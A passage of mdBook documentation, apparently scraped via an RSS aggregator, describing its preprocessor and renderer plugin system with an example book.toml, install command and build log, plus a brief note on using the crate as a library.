The way a book is loaded and rendered can be configured by the user via third party plugins. These plugins are just programs which will be invoked during the build process and are split into roughly two categories, preprocessors andrenderers.
Preprocessors are used to transform a book before it is sent to a renderer. One example would be to replace all occurrences of {{#include some_file.ext}} with the contents of that file. Some existing preprocessors are:
  • index - a built-in preprocessor (enabled by default) which will transform all README.md chapters to index.md so foo/README.md can be accessed via the url foo/ when published to a browser
  • links - a built-in preprocessor (enabled by default) for expanding the {{# playpen}} and {{# include}} helpers in a chapter.
Renderers are given the final book so they can do something with it. This is typically used for, as the name suggests, rendering the document in a particular format, however there's nothing stopping a renderer from doing static analysis of a book in order to validate links or run tests. Some existing renderers are:
  • html - the built-in renderer which will generate a HTML version of the book
  • linkcheck - a backend which will check that all links are valid
  • epub - an experimental EPUB generator
Note for Developers: Feel free to send us a PR if you've developed your own plugin and want it mentioned here.
A preprocessor or renderer is enabled by installing the appropriate program and then mentioning it in the book's book.toml file.
$ cargo install mdbook-linkcheck
$ edit book.toml && cat book.toml
[book]
title = "My Awesome Book"
authors = ["Michael-F-Bryan"]

[output.html]

[output.linkcheck] # enable the "mdbook-linkcheck" renderer

$ mdbook build
2018-10-20 13:57:51 [INFO] (mdbook::book): Book building has started
2018-10-20 13:57:51 [INFO] (mdbook::book): Running the html backend
2018-10-20 13:57:53 [INFO] (mdbook::book): Running the linkcheck backend
For more information on the plugin system, consult the User Guide.

As a library

Aside from the command line interface, this crate can also be used as a library. This means that you could integrate it in an existing project, like a web-app for example. Since the command line interface is just a wrapper around the library functionality, when you use this crate as a library you have full access to all the functionality of the command line interface with an easy to use API and more!
See the User Guide and the API docs for more information.

dyne.org

Viewing all 20515 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>